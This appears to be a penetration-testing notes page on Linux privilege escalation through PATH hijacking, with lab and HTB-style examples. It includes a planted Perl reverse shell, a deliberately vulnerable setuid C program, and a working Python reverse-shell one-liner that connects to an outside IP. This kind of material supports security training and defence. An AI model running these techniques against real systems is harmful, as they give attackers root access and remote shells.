Path Abuse

env | grep PATH or echo $PATH.

echo $PATH

/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games

If we can modify a user's path, we could replace a common binary such as ls with a malicious script such as a reverse shell. If we add . to the path by issuing the command PATH=.:$PATH and then export PATH, we will be able to run binaries located in our current working directory by just typing the name of the file

~$ PATH=.:${PATH}
~$ export PATH
~$ echo $PATH

.:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
~$ touch ls
~$ echo 'echo "PATH ABUSE!!"' > ls
~$ chmod +x ls
~$ ls

PATH ABUSE!!

Example 1

2019/10/08 10:56:02 CMD: UID=0    PID=2689   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new

# PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

jkr@writeup:~$ which run-parts
/bin/run-parts

#
jkr@writeup:~$ cp perl-reverse-shell.pl run-parts
jkr@writeup:~$ ls
perl-reverse-shell.pl  run-parts  user.txt
jkr@writeup:~$ mv run-parts /usr/local/sbin

Ref: HTB - Write-Up

Example 2

# file weak_c.c

#include <stdlib.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
 
int main(void)
{
    setreuid(geteuid(), geteuid());
    system("ls /path/to/secret/.file");
    return 0;
}
$ which cat
/bin/cat
cp /bin/cat /tmp/ls
$ export PATH=/tmp/:$PATH
$ ./weak_c

Example 3

theseus@ubuntu:/tmp/poc$ nano fdisk
theseus@ubuntu:/tmp/poc$ cat fdisk
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.77",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
theseus@ubuntu:/tmp/poc$ chmod 777 fdisk
theseus@ubuntu:/tmp/poc$ export PATH=/tmp/poc:$PATH
theseus@ubuntu:/tmp/poc$ /bin/sysinfo

Resources

PreviousCredentials HuntingNextWildcard Abuse

Last updated